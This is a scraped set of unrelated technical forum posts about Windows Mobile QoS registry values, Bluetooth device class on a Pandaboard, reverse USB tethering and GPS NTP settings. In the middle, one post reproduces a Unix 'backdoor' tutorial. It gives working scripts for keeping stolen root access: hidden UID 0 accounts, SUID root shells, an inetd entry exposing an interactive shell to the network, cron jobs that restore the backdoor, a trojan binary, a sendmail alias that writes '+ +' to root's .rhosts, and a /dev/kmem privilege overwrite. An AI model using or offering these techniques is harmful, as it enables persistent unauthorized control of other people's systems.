On this page: http://msdn2.microsoft.com/en-us/library/aa926591.aspx it lists the default DSCP settings used by the RTC Client in Windows Mobile 6. The default DSCP value for SIP signalling an RTP media is 0x38 (or DSCP 56, IP Precedence 7). I wish to change this however adding the relevent values to the registry does not change what DSCP values are set; they always remain at 0x38:
Code:
REGEDIT4
[HKEY_LOCAL_MACHINE\Comm\RTC\QoS]
"Disabled"=dword:00000000
"DSCPSIP"=dword:00000018
"DSCPAudioRTP"=dword:0000002e
"DSCPAudioRTCP"=dword:0000002e
This should in theory set DSCP 24 (0x18) or SIP Signalling packets and DSCP 46 (0x2e) for RTP & RTCP packets. I have made the registry changes, left it for a while and soft-reset. Following bootup I have checked that the settings are stored in the registry, however if I make a call and capture the traffic I can still only see DSCP being set to 56 (0x38). Has anyone else played around with the QoS settings?
I am using version 5.2.318 (Build 15342) with the replacement VoIP files to get around the issue with L2TP/IPSec.
Andy
VoipSipSdk
VoipSipSdk
I am now looking for voip solutions. And found information about Voip sdk.
According to their website www.voipsipsdk.com
Voip sdk is based on IETF standards (SIP, STUN, etc.), so it should be compatible with other standard based products such as Asterisk, OpenSER other.
They have all features I need:
# Dynamically loadable codecs
# Registrar support
# Play wav files into conversation
# Record conversation into file
# Hold/Retrieve call
# Forward Call (Blind Call Transfer)
# Transfer Call (Attended Transfer)
# Mute Sound
# VPN support
# Noise reduction
# Auto gain
# Jitter buffer parameters
# Samples on Delphi, C#, VB, VB.NET, C++ 2005, C++ 6.0, HTML (SIP ActiveX)
# Windowless samples on C++ and .NET
# DTMF
# Adaptive silence detection
# Adaptive jitter buffer
# STUN support
# Comes as ActiveX control
But before I will download the evaluation version I would like to hear other people experience.
Hi everybody,
I'm developing on a Pandaboard ES. I compiled AOSP 4.0.4 and a kernel from scratch, everything working quite good so far.
As I need to connect some weird bt-devices I have to change the default bt-class.
This is what I get from hciconfig -a:
Code:
/ # hciconfig -a
hci0: Type: BR/EDR Bus: UART
BD Address: 1C:E2:XX:XX:XX:XX ACL MTU: 1021:4 SCO MTU: 180:4
UP RUNNING PSCAN
RX bytes:2148 acl:0 sco:0 events:92 errors:0
TX bytes:1472 acl:0 sco:0 commands:92 errors:0
Features: 0xff 0xfe 0x2d 0xfe 0xdb 0xff 0x7b 0x87
Packet type: DM1 DM3 DM5 DH1 DH3 DH5 HV1 HV2 HV3
Link policy: RSWITCH HOLD SNIFF
Link mode: SLAVE ACCEPT
Name: 'BlueZ'
[COLOR="Red"]Class: 0x1a0000[/COLOR]
Service Classes: Networking, Capturing, Object Transfer
[COLOR="red"]Device Class: Miscellaneous, [/COLOR]
HCI Version: 4.0 (0x6) Revision: 0x0
LMP Version: 4.0 (0x6) Subversion: 0x1f22
Manufacturer: Texas Instruments Inc. (13)
By default there is no main.conf in /etc/bluetooth/. But I can find two different ones in the sources from where I'm compiling.
1: /external/bluetooth/bluez/src/main.conf
2: /system/bluetooth/data/main.conf
I modified one, pushed it to the pandaboard and rebooted, but the file is ignored. Neither the class nor the name change as expected.
Changing the class with hcitool works, but this is, of course, not permanent. (When changing the class I can connect my "weird" device without problems.)
Why is the file ignored? File owner and rights are the same as on my Nexus S. Here the file exists. (Unfortunately I can't check if its really parsed here, because it's my productive phone, so it is unrooted and stock 4.0.4)
Below you find the content of /etc/bluetooth and main.conf which I pushed to the pandaboard.
Code:
/ # ls -al /etc/bluetooth/
-r--r----- bluetooth bluetooth 1699 2012-05-11 10:31 audio.conf
-rw-r----- system system 1536 2012-05-11 10:31 auto_pairing.conf
-r--r--r-- net_bt net_bt 401 2012-05-11 10:31 blacklist.conf
-r--r----- bluetooth bluetooth 262 2012-05-11 10:31 input.conf
-r--r--r-- bluetooth bluetooth 2802 2012-06-25 09:44 main.conf
-r--r----- bluetooth bluetooth 120 2012-05-11 10:31 network.conf
PHP:
[General]
# List of plugins that should not be loaded on bluetoothd startup
#DisablePlugins = network,input
# Default adaper name
# %h - substituted for hostname
# %d - substituted for adapter id
Name = "Panda"
# Default device class. Only the major and minor device class bits are
# considered.
Class = 0x400210
# How long to stay in discoverable mode before going back to non-discoverable
# The value is in seconds. Default is 180, i.e. 3 minutes.
# 0 = disable timer, i.e. stay discoverable forever
DiscoverableTimeout = 120
# How long to stay in pairable mode before going back to non-discoverable
# The value is in seconds. Default is 0.
# 0 = disable timer, i.e. stay pairable forever
PairableTimeout = 0
# Use some other page timeout than the controller default one
# which is 16384 (10 seconds).
PageTimeout = 8192
# Discover scheduler interval used in Adapter.DiscoverDevices
# The value is in seconds. Defaults is 30.
DiscoverSchedulerInterval = 30
# What value should be assumed for the adapter Powered property when
# SetProperty(Powered, ...) hasn't been called yet. Defaults to true
InitiallyPowered = true
# Remember the previously stored Powered state when initializing adapters
RememberPowered = true
# Use vendor, product and version information for DID profile support.
# The values are separated by ":" and VID, PID and version.
DeviceID = android:generic:1.5
# Do reverse service discovery for previously unknown devices that connect to
# us. This option is really only needed for qualification since the BITE tester
# doesn't like us doing reverse SDP for some test cases (though there could in
# theory be other useful purposes for this too). Defaults to true.
ReverseServiceDiscovery = true
# Enable name resolving after inquiry. Set it to 'false' if you don't need
# remote devices name and want shorter discovery cycle. Defaults to 'true'.
NameResolving = true
# Enable runtime persistency of debug link keys. Default is false which
# makes debug link keys valid only for the duration of the connection
# that they were created for.
DebugKeys = false
# Enable Low Energy support if the dongle supports. Default is false.
# Enable/Disable interleave discovery and attribute server over LE.
EnableLE = false
# Enable the GATT Attribute Server. Default is false, because it is only
# useful for testing. Attribute server is not enabled over LE if EnableLE
# is false.
AttributeServer = false
# The link policy for connections. By default it's set to 0x000f which is
# a bitwise OR of role switch(0x0001), hold mode(0x0002), sniff mode(0x0004)
# and park state(0x0008) are all enabled. However, some devices have
# connection stability issue or fail to setup SCO when the link is in park
# state, which requires park state bit cleared.
DefaultLinkPolicy = 0x000f
bump
Nobody an idea?
Bumping this a last time as this topic is still not solved.
Any help would be great.
Hey All,
Hope this hasn't been covered. I did search a bit and found some clues, but not something that totally worked for me. I figured I'd put up a post telling y'all how I made it work. I suppose this post is just more clues for somebody else, but at least it seems like a different set of clues than what I was able to find.
I've wanted to use the phone's USB connection to use work's Internet connection to download updates to my phone and conserve my measly 2GB/month data.
Running Cyanogenmod 9.1.0. Don't know how this would translate to others.
The tricks to reverse USB tether are
A) Get the phone to connect to a Linux host over the USB as in a normal tether
B) Set up IP forwarding and NAT on the Linux host (which has a perfectly fine Ethernet connection to the Internet)
C) Change the phone's default route to point at the Linux host
D) Change the phone to use the same DNS servers visible to the Linux host
A-C were pretty easy. D was actually the hardest. Here's my notes I'm storing on the phone:
***********************************************************************
* On the linux host
# ip addr show
2: p2p1: ...
inet 10.2.59.107/18 brd 10.2.63.255 scope global p2p1
7: usb0: ...
inet 192.168.42.151/24 brd 192.168.42.255 scope global usb0
* This part is classic "setting up a NAT" which is easily googled.
# echo 1 > /proc/sys/net/ipv4/ip_forward
# iptables -t nat -A POSTROUTING -o p2p1 -j MASQUERADE
# iptables -A FORWARD -i p2p1 -o usb0 -m state --state RELATED,ESTABLISHED -j ACCEPT
# iptables -A FORWARD -i usb0 -o p2p1 -j ACCEPT
* This tells us some IP addresses to use as nameservers.
cat /etc/resolv.conf
# nameserver 10.2.10.24
# nameserver 10.2.10.26
***********************************************************************
* On the android device disable all other methods of accessing the internet.
* That is, turn off Wi-Fi and System Settings, Wireless & networks, Mobile
* networks, Uncheck "Data enabled". This might not be necessary. I did it to
* make sure the rest of what I was doing worked.
* Try 'ip route' without other args and delete any existing default route if
* you have one.
# ip route add default via 192.168.42.151 dev rndis0
# getprop | grep dns
[net.change]: [net.dns2]
[net.dns1]: [172.26.38.1]
[net.dns2]: [172.26.38.2]
[net.dnschange]: [1]
[net.rmnet_sdio0.dns1]: []
# setprop net.dns1 10.2.10.24
# setprop net.dns2 10.2.10.26
* * Avoid the Primrose Path. This sort of acted like it would work, but then
* * didn't at all.
*
* # cat /emmc/resolv_work.conf
* nameserver 10.2.10.24
* nameserver 10.2.10.26
*
* # pkill dnsmasq
* # dnsmasq -d -r /emmc/resolv_work.conf
I thought this was interesting paper written by an unknown author
You've been at it for all night. Trying all the exploits you can think of. The system seems tight. The system looks tight.
The system *is* tight. You've tried everything. Default passwds, guessable passwds, NIS weaknesses, NFS holes, incorrect
permissions, race conditions, SUID exploits, Sendmail bugs, and so on... Nothing.After seeming endless you've managed to steal root. Now what? How do you hold onto this precious super-user
privilege you have worked so hard to achieve....?
This list is BY NO MEANS comprehensive. There are as many ways to leave backdoors into a UNIX computer as there are
ways into one.
Beforehand
Know the location of critical system files. This should be obvious (If you can't list any of the top of your head, stop reading
now, get a book on UNIX, read it, then come back to me...). Familiarity with passwd file formats (including general 7 field
format, system specific naming conventions, shadowing mechanisms, etc...). Know vi. Many systems will not have those
robust, user-friendly editors such as Pico and Emacs. Vi is also quite useful for needing to quickly seach and edit a large file. If
you are connecting remotely (via dial-up/telnet/rlogin/whatver) it's always nice to have a robust terminal program that has a
nice, FAT scrollback buffer. This will come in handy if you want to cut and paste code, rc files, shell scripts, etc...
The permenance of these backdoors will depend completely on the technical saavy of the administrator. The experienced and
skilled administrator will be wise to many (if not all) of these backdoors. But, if you have managed to steal root, it is likely the
admin isn't as skilled (or up to date on bug reports) as she should be, and many of these doors may be in place for some time
to come. One major thing to be aware of, is the fact that if you can cover you tracks during the initial break-in, no one will be
looking for back doors.
The JDevil Overt
[1] Add a UID 0 account to the passwd file. This is probably the most obvious and quickly discovered method of rentry. It
flies a red flag to the admin, saying "WE'RE UNDER ATTACK!!!". If you must do this, my advice is DO NOT simply
prepend or append it. Anyone causally examining the passwd file will see this. So, why not stick it in the middle...
#!/bin/csh
# Inserts a UID 0 account into the middle of the passwd file.
# There is likely a way to do this in 1/2 a line of AWK or SED. Oh well.
# [email protected]
set linecount = `wc -l /etc/passwd`
cd # Do this at home.
cp /etc/passwd ./temppass # Safety first.
echo passwd file has $linecount[1] lines.
@ linecount[1] /= 2
@ linecount[1] += 1 # we only want 2 temp files
echo Creating two files, $linecount[1] lines each \(or approximately that\).
split -$linecount[1] ./temppass # passwd string optional
echo "jdevil::0:0:jdevil:/home/sweet/home:/bin/csh" >> ./xaa
cat ./xab >> ./xaa
mv ./xaa /etc/passwd
chmod 644 /etc/passwd # or whatever it was beforehand
rm ./xa* ./temppass
echo Done...
NEVER, EVER, change the root password. The reasons are obvious.
[2] In a similar vein, enable a disabled account as UID 0, such as Sync. Or, perhaps, an account somwhere buried deep in the
passwd file has been abandoned, and disabled by the sysadmin. Change her UID to 0 (and remove the '*' from the second
field).
[3] Leave an SUID root shell in /tmp.
#!/bin/sh
# Everyone's favorite...
cp /bin/csh /tmp/.JDEVIL # Don't name it that...
chmod 4755 /tmp/.JDEVIL
Many systems run cron jobs to clean /tmp nightly. Most systems clean /tmp upon a reboot. Many systems have /tmp mounted
to disallow SUID programs from executing. You can change all of these, but if the filesystem starts filling up, people may
notice...but, hey, this *is* the overt section....). I will not detail the changes neccessary because they can be quite system
specific. Check out /var/spool/cron/crontabs/root and /etc/fstab.
The JDEVIL Veiled
[4] The super-server configuration file is not the first place a sysadmin will look, so why not put one there? First, some
background info: The Internet daemon (/etc/inetd) listens for connection requests on TCP and UDP ports and spawns the
appropriate program (usally a server) when a connection request arrives. The format of the /etc/inetd.conf file is simple. Typical
lines look like this:
(1) (2) (3) (4) (5) (6) (7)
ftp stream tcp nowait root /usr/etc/ftpd ftpd
talk dgram udp wait root /usr/etc/ntalkd ntalkd
Field (1) is the daemon name that should appear in /etc/services. This tells inetd what to look for in /etc/services to determine
which port it should associate the program name with. (2) tells inetd which type of socket connection the daemon will expect.
TCP uses streams, and UDP uses datagrams. Field (3) is the protocol field which is either of the two transport protocols, TCP
or UDP. Field (4) specifies whether or not the daemon is iterative or concurrent. A 'wait' flag indicates that the server will
process a connection and make all subsequent connections wait. 'Nowait' means the server will accept a connection, spawn a
child process to handle the connection, and then go back to sleep, waiting for further connections. Field (5) is the user (or more
inportantly, the UID) that the daemon is run as. (6) is the program to run when a connection arrives, and (7) is the actual
command (and optional arguments). If the program is trivial (usally requiring no user interaction) inetd may handle it internally.
This is done with an 'internal' flag in fields (6) and (7).
So, to install a handy backdoor, choose a service that is not used often, and replace the daemon that would normally handle it
with something else. A program that creates an SUID root shell, a program that adds a root account for you in the /etc/passwd
file, etc...
For the insinuation-impaired, try this:
Open the /etc/inetd.conf in an available editor. Find the line that reads:
daytime stream tcp nowait root internal
and change it to:
daytime stream tcp nowait /bin/sh sh -i.
You now need to restart /etc/inetd so it will reread the config file. It is up to you how you want to do this. You can kill and
restart the process, (kill -9 , /usr/sbin/inetd or /usr/etc/inetd) which will interuppt ALL network connections (so it is a good idea
to do this off peak hours).
[5] An option to compromising a well known service would be to install a new one, that runs a program of your choice. One
simple solution is to set up a shell the runs similar to the above backdoor. You need to make sure the entry appears in
/etc/services as well as in /etc/inetd.conf. The format of the /etc/services file is simple:
(1) (2)/(3) (4)
smtp 25/tcp mail
Field (1) is the service, field (2) is the port number, (3) is the protocol type the service expects, and (4) is the common name
associated with the service. For instance, add this line to /etc/services:
jdevil 22/tcp jdevil
and this line to /etc/inetd.conf:
jdevil stream tcp nowait /bin/sh sh -i
Restart inetd as before.
Note: Potentially, these are a VERY powerful backdoors. They not only offer local rentry from any account on the system,
they offer rentry from *any* account on *any* computer on the Internet.
[6] Cron-based trojan I. Cron is a wonderful system administration tool. It is also a wonderful tool for backdoors, since root's
crontab will, well, run as root... Again, depending on the level of experience of the sysadmin (and the implementation), this
backdoor may or may not last. /var/spool/cron/crontabs/root is where root's list for crontabs is usally located. Here, you have
several options. I will list a only few, as cron-based backdoors are only limited by your imagination. Cron is the clock daemon.
It is a tool for automatically executing commands at specified dates and times. Crontab is the command used to add, remove,
or view your crontab entries. It is just as easy to manually edit the /var/spool/crontab/root file as it is to use crontab. A crontab
entry has six fields:
(1) (2) (3) (4) (5) (6)
0 0 * * 1 /usr/bin/updatedb
Fields (1)-(5) are as follows: minute (0-59), hour (0-23), day of the month (1-31) month of the year (1-12), day of the week
(0-6). Field (6) is the command (or shell script) to execute. The above shell script is executed on Mondays. To exploit cron,
simply add an entry into /var/spool/crontab/root. For example: You can have a cronjob that will run daily and look in the
/etc/passwd file for the UID 0 account we previously added, and add him if he is missing, or do nothing otherwise (it may not
be a bad idea to actually *insert* this shell code into an already installed crontab entry shell script, to further obfuscate your
shady intentions). Add this line to /var/spool/crontab/root:
0 0 * * * /usr/bin/trojancode
This is the shell script:
#!/bin/csh
# Is our jdevil still on the system? Let's make sure he is.
#[email protected]
set JDEVILflag = (`grep jdevil /etc/passwd`)
if($#JDEVILflag == 0) then # Is he there?
set linecount = `wc -l /etc/passwd`
cd # Do this at home.
cp /etc/passwd ./temppass # Safety first.
@ linecount[1] /= 2
@ linecount[1] += 1 # we only want 2 temp files
split -$linecount[1] ./temppass # passwd string optional
echo "jdevil::0:0:Mr. Sinister:/home/sweet/home:/bin/csh" >> ./xaa
cat ./xab >> ./xaa
mv ./xaa /etc/passwd
chmod 644 /etc/passwd # or whatever it was beforehand
rm ./xa* ./temppass
echo Done...
else
endif
[7] Cron-based trojan II. This one was brought to my attention by our very own Mr. Zippy. For this, you need a copy of the
/etc/passwd file hidden somewhere. In this hidden passwd file (call it /var/spool/mail/.sneaky) we have but one entry, a root
account with a passwd of your choosing. We run a cronjob that will, every morning at 2:30am (or every other morning), save a
copy of the real /etc/passwd file, and install this trojan one as the real /etc/passwd file for one minute (synchronize swatches!).
Any normal user or process trying to login or access the /etc/passwd file would get an error, but one minute later, everything
would be ok. Add this line to root's crontab file:
29 2 * * * /bin/usr/_passwd
make sure this exists:
#echo "root:1234567890123:0:0perator:/:/bin/csh" > /var/spool/mail/.passwd
and this is the simple shell script:
#!/bin/csh
# Install trojan /etc/passwd file for one minute
#[email protected]
cp /etc/passwd /etc/.temppass
cp /var/spool/mail/passwd /etc/passwd
sleep 60
mv /etc/.temppass /etc/passwd
[8] Compiled code trojan. Simple idea. Instead of a shell script, have some nice C code to obfuscate the effects. Here it is.
Make sure it runs as root. Name it something innocous. Hide it well.
/* A little trojan to create an SUID root shell, if the proper argument is
given. C code, rather than shell to hide obvious it's effects. */
/* [email protected] */
#include
#define KEYWORD "industry3"
#define BUFFERSIZE 10
int main(argc, argv)
int argc;
char *argv[];{
int i=0;
if(argv[1]){ /* we've got an argument, is it the keyword? */
if(!(strcmp(KEYWORD,argv[1]))){
/* This is the trojan part. */
system("cp /bin/csh /bin/.swp121");
system("chown root /bin/.swp121");
system("chmod 4755 /bin/.swp121");
}
}
/* Put your possibly system specific trojan
messages here */
/* Let's look like we're doing something... */
printf("Sychronizing bitmap image records.");
/* system("ls -alR / >& /dev/null > /dev/null&"); */
for(;i<10;i++){
fprintf(stderr,".");
sleep(1);
}
printf("\nDone.\n");
return(0);
} /* End main */
[9] The sendmail aliases file. The sendmail aliases file allows for mail sent to a particular username to either expand to several
users, or perhaps pipe the output to a program. Most well known of these is the uudecode alias trojan. Simply add the line:
"decode: "|/usr/bin/uudecode"
to the /etc/aliases file. Usally, you would then create a uuencoded .rhosts file with the full pathname embedded.
#! /bin/csh
# Create our .rhosts file. Note this will output to stdout.
echo "+ +" > tmpfile
/usr/bin/uuencode tmpfile /root/.rhosts
Next telnet to the desired site, port 25. Simply fakemail to decode and use as the subject body, the uuencoded version of the
.rhosts file. For a one liner (not faked, however) do this:
%echo "+ +" | /usr/bin/uuencode /root/.rhosts | mail [email protected]
You can be as creative as you wish in this case. You can setup an alias that, when mailed to, will run a program of your
choosing. Many of the previous scripts and methods can be employed here.
The JDEVIL Covert
[10] Trojan code in common programs. This is a rather sneaky method that is really only detectable by programs such tripwire.
The idea is simple: insert trojan code in the source of a commonly used program. Some of most useful programs to us in this
case are su, login and passwd because they already run SUID root, and need no permission modification. Below are some
general examples of what you would want to do, after obtaining the correct sourcecode for the particular flavor of UNIX you
are backdooring. (Note: This may not always be possible, as some UNIX vendors are not so generous with thier sourcecode.)
Since the code is very lengthy and different for many flavors, I will just include basic psuedo-code:
get input;
if input is special hardcoded flag, spawn evil trojan;
else if input is valid, continue;
else quit with error;
...
Not complex or difficult. Trojans of this nature can be done in less than 10 lines of additional code.
The JDEVIL Esoteric
[11] /dev/kmem exploit. It represents the virtual of the system. Since the kernel keeps it's parameters in memory, it is possible
to modify the memory of the machine to change the UID of your processes. To do so requires that /dev/kmem have read/write
permission. The following steps are executed: Open the /dev/kmem device, seek to your page in memory, overwrite the UID of
your current process, then spawn a csh, which will inherit this UID. The following program does just that.
/* If /kmem is is readable and writable, this program will change the user's
UID and GID to 0. */
/* This code originally appeared in "UNIX security: A practical tutorial"
with some modifications by [email protected] */
#include
#include
#include
#include
#include
#include
#include
#define KEYWORD "nomenclature1"
struct user userpage;
long address(), userlocation;
int main(argc, argv, envp)
int argc;
char *argv[], *envp[];{
int count, fd;
long where, lseek();
if(argv[1]){ /* we've got an argument, is it the keyword? */
if(!(strcmp(KEYWORD,argv[1]))){
fd=(open("/dev/kmem",O_RDWR);
if(fd<0){
printf("Cannot read or write to /dev/kmem\n");
perror(argv);
exit(10);
}
userlocation=address();
where=(lseek(fd,userlocation,0);
if(where!=userlocation){
printf("Cannot seek to user page\n");
perror(argv);
exit(20);
}
count=read(fd,&userpage,sizeof(struct user));
if(count!=sizeof(struct user)){
printf("Cannot read user page\n");
perror(argv);
exit(30);
}
printf("Current UID: %d\n",userpage.u_ruid);
printf("Current GID: %d\n",userpage.g_ruid);
userpage.u_ruid=0;
userpage.u_rgid=0;
where=lseek(fd,userlocation,0);
if(where!=userlocation){
printf("Cannot seek to user page\n");
perror(argv);
exit(40);
}
write(fd,&userpage,((char *)&(userpage.u_procp))-((char *)&userpage));
execle("/bin/csh","/bin/csh","-i",(char *)0, envp);
}
}
} /* End main */
#include
#include
#include
#define LNULL ((LDFILE *)0)
long address(){
LDFILE *object;
SYMENT symbol;
long idx=0;
object=ldopen("/unix",LNULL);
if(!object){
fprintf(stderr,"Cannot open /unix.\n");
exit(50);
}
for(;ldtbread(object,idx,&symbol)==SUCCESS;idx++){
if(!strcmp("_u",ldgetname(object,&symbol))){
fprintf(stdout,"User page is at 0x%8.8x\n",symbol.n_value);
ldclose(object);
return(symbol.n_value);
}
}
fprintf(stderr,"Cannot read symbol table in /unix.\n");
exit(60);
}
[12] Since the previous code requires /dev/kmem to be world accessable, and this is not likely a natural event, we need to take
care of this. My advice is to write a shell script similar to the one in [7] that will change the permissions on /dev/kmem for a
discrete amount of time (say 5 minutes) and then restore the original permissions. You can add this source to the source in [7]:
chmod 666 /dev/kmem
sleep 300 # Nap for 5 minutes
chmod 600 /dev/kmem # Or whatever it was before
JDevil
Happy Reading
There are some small spacing errors in code but you the idea
So I had been having problems with my GPS getting a fix when using Maps etc. It was getting fix with High Accuracy mode but with Device Only mode it wasn't working.
So I tried to tinker with the gps.conf file located in /system/etc/
You need root access for this.
Make a backup of /system/etc/gps.conf file
Go to http://www.pool.ntp.org/en/ and get the address of the server nearest to you. E.g. Mine is pk.pool.ntp.org for Pakistan.
Using your favorite text editor, open the file gps.conf
Code:
#Uncommenting these urls would only enable
#the power up auto injection and force injection(test case).
#XTRA_SERVER_1=http://xtra1.gpsonextra.net/xtra.bin
#XTRA_SERVER_2=http://xtra2.gpsonextra.net/xtra.bin
#XTRA_SERVER_3=http://xtra3.gpsonextra.net/xtra.bin
#
XTRA_SERVER_1=http://xtra1.gpsonextra.net/xtra2.bin
XTRA_SERVER_2=http://xtra2.gpsonextra.net/xtra2.bin
XTRA_SERVER_3=http://xtra3.gpsonextra.net/xtra2.bin
# Error Estimate
# _SET = 1
# _CLEAR = 0
ERR_ESTIMATE=0
#Test
NTP_SERVER=time.gpsonextra.net
#Asia
[color=blue] # NTP_SERVER=asia.pool.ntp.org[/color]
#Europe
# NTP_SERVER=europe.pool.ntp.org
#North America
# NTP_SERVER=north-america.pool.ntp.org
# DEBUG LEVELS: 0 - none, 1 - Error, 2 - Warning, 3 - Info
# 4 - Debug, 5 - Verbose
# If DEBUG_LEVEL is commented, Android's logging levels will be used
DEBUG_LEVEL = 2
# Intermediate position report, 1=enable, 0=disable
INTERMEDIATE_POS=0
# supl version 1.0
SUPL_VER=0x10000
# Emergency SUPL, 1=enable, 0=disable
SUPL_ES=1
# GPS Capabilities bit mask
# SCHEDULING = 0x01
# MSB = 0x02
# MSA = 0x04
# ON_DEMAND_TIME = 0x10
# GEOFENCE = 0x20
# default = ON_DEMAND_TIME | MSA | MSB | SCHEDULING | GEOFENCE
CAPABILITIES=0x37
# Accuracy threshold for intermediate positions
# less accurate positions are ignored, 0 for passing all positions
# ACCURACY_THRES=5000
################################
##### AGPS server settings #####
################################
# FOR SUPL SUPPORT, set the following
# SUPL_HOST=supl.host.com or IP
# SUPL_PORT=1234
# FOR C2K PDE SUPPORT, set the following
# C2K_HOST=c2k.pde.com or IP
# C2K_PORT=1234
####################################
# LTE Positioning Profile Settings
####################################
# 0: Enable RRLP on LTE(Default)
# 1: Enable LPP_User_Plane on LTE
# 2: Enable LPP_Control_Plane
# 3: Enable both LPP_User_Plane and LPP_Control_Plane
LPP_PROFILE = 0
################################
# EXTRA SETTINGS
################################
# NMEA provider (1=Modem Processor, 0=Application Processor)
NMEA_PROVIDER=0
# Mark if it is a SGLTE target (1=SGLTE, 0=nonSGLTE)
SGLTE_TARGET=0
##################################################
# Select Positioning Protocol on A-GLONASS system
##################################################
# 0x1: RRC CPlane
# 0x2: RRLP UPlane
# 0x4: LLP Uplane
A_GLONASS_POS_PROTOCOL_SELECT = 0
Remove the # symbol at the start of the blue line and replace asia.pool.ntp.org with the nearest country server address.
reboot and the GPS should fix faster.
Sent from my A0001 using Tapatalk
can you make an app like FasterGPS?
I use it to add Pakistan quickly, but issue is it only adds pk.pool.ntp.org, pool.NTP.org servers and removes all gpsonextra.net servers
---------- Post added at 01:54 PM ---------- Previous post was at 01:32 PM ----------
can you make an app for this like FasterGPS?
issue with fasterGPS app is, it removes all timeonextra.net servers
i want to use it for Pakistan as well